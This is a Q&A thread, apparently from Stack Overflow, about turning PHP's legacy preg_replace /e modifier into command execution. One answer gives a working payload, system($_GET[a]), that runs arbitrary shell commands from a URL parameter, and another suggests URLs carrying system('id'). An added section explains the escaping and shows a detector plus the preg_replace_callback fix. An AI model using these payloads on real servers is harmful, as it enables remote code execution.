Reputation: 2941
I am doing some security research and I have a problem with the evaluation of preg_replace() in PHP. My goal is that I can execute commands with this function. I have control over the first and third parameter of the preg_replace function but not the second. This code works just as intended; I only have trouble using a function like system(), which needs a string as a parameter which I am not able to provide.
echo preg_replace('/(.+)/e', '\\1', "phpinfo()");
echo preg_replace('/(.+)/e', '\\1', 'phpinfo()');//we both work as intended
I have tried this simple example to find out how to use quotes and make use of strings in this context.
echo preg_replace('/(.+)/e', '\\1', '$a="1"');
echo preg_replace('/(.+)/e', '\\1', "$a='1'"); //basically the same, only switched ' and "
It is supposed to execute the command $a="1";
(I am well aware that it does nothing useful).
To be completely precise, the third parameter is a GET parameter and I do not know if it is still relevant in this case what kind of quotation marks I use. To accommodate both cases I tried both, but without any success.
When I execute this line,
php > echo preg_replace('/(.+)/e', '\\1', '$a="1"');
I get an error like,
PHP Parse error: syntax error, unexpected '"', expecting identifier (T_STRING) in php shell code(1) : regexp code on line 1
PHP Fatal error: preg_replace(): Failed evaluating code:
$a=\"1\" in php shell code on line 1
//Same command, switches quotation marks
php > echo preg_replace('/(.+)/e', '\\1', "$a='1'");
PHP Notice: Undefined variable: a in php shell code on line 1
PHP Parse error: syntax error, unexpected '=' in php shell code(1) : regexp code on line 1
PHP Fatal error: preg_replace(): Failed evaluating code:
=\'1\' in php shell code on line 1
I have read the error messages and did some research on this topic but was unable to find something that helped me.
Using preg_quote around the third parameter does not solve this problem.
What I want is being able to execute functions that take strings as an input in the evaluation of preg_replace(). Any help is highly appreciated.
Upvotes: 1
Views: 2001
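The escaping the question runs into is documented behaviour of the /e modifier: before the replacement string is evaluated, each backreference is substituted with the matched text with single quotes, double quotes, backslashes and NUL bytes escaped by backslashes, which is why $a="1" reaches eval as $a=\"1\". The modifier was deprecated in PHP 5.5 and removed in PHP 7.0. The following is an added example, not code from the question or the answers, written for PHP 7.0 or later: it shows a small review helper that flags patterns carrying /e (assumes the usual single-character delimiter form such as /…/ or #…#), and the preg_replace_callback form that performs a substitution without ever evaluating the subject as PHP code. The function names and the sample input are constructed for this example.

```php
<?php
// Added example, not from the original post or answers.
// (1) uses_eval_modifier(): a helper a code reviewer can run over pattern
//     literals to flag the removed /e modifier.
// (2) upper_words(): the preg_replace_callback form of a substitution, where
//     the matched text is passed to the callback as plain data.

/**
 * Return true if a PCRE pattern string ends with a modifier set containing 'e'.
 * Assumes a single non-alphanumeric, non-backslash delimiter (/.../ or #...#);
 * bracket-style delimiters such as (...) are not handled by this check.
 */
function uses_eval_modifier(string $pattern): bool
{
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return false;
    }
    $delimiter = $pattern[0];
    if (ctype_alnum($delimiter) || $delimiter === '\\') {
        return false; // not a valid delimiter, so there is no modifier block to inspect
    }
    $end = strrpos($pattern, $delimiter);
    if ($end === false || $end === 0) {
        return false; // no closing delimiter found
    }
    $modifiers = substr($pattern, $end + 1);
    return strpos($modifiers, 'e') !== false;
}

/**
 * Uppercase every word in $subject. The captured text reaches the callback as
 * a string: quotes, dollar signs and parentheses in it are data, not code,
 * so nothing in the subject or in the request can alter what is executed.
 */
function upper_words(string $subject): string
{
    return preg_replace_callback(
        '/\b(\w+)\b/',
        function (array $m): string {
            return strtoupper($m[1]);
        },
        $subject
    );
}

// Constructed input reusing the text from the question: under /e this would
// have been handed to eval, here it is only matched and transformed.
$input = '$a="1" and phpinfo()';

var_dump(uses_eval_modifier('/(.+)/e'));   // the pattern from the question
var_dump(uses_eval_modifier('/(.+)/i'));   // same pattern with a harmless modifier
echo upper_words($input), "\n";
```

The review helper is a cheap first pass over a code base; a grep for `preg_replace(` combined with it catches the legacy pattern before an interpreter downgrade or a compatibility shim reintroduces eval behaviour. The callback form is the drop-in fix the PHP manual recommends, and it keeps whatever the request supplies on the data side of the call.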
Reputation: 2941
I figured out how to solve my problem. I came to the conclusion that what I wanted to do does not seem to be possible, at least not in this way.
However, when I use the following code
echo preg_replace("/(.+)/e", "\\1", "system($_GET[a])");
I can simply add another GET parameter in the URL which contains all my commands. With this method I do not need to care about preg_replace escaping my ' and ".
Note that the use of $_GET[a] is not correct, but because PHP is so nice it just assumes that the unknown constant a is supposed to be a string and interprets it this way. In the GET parameter a I can now insert any command I desire to execute.
Upvotes: 0
Reputation: 217
I would like to comment but can't yet...
I assume the code looks like this:
preg_replace('/(.+)/e', '\\1', $_GET['code']);
since you are saying that the third parameter comes with GET. Can't you just do something like
http://somesuperduperurl.xxx/code=system('id')
? You say that you are able to control the first parameter of preg_replace. Is it also through a GET?
http://somesuperduperurl.xxx/sth=/known/e?code=system('id')
Have you tried this?
Upvotes: 1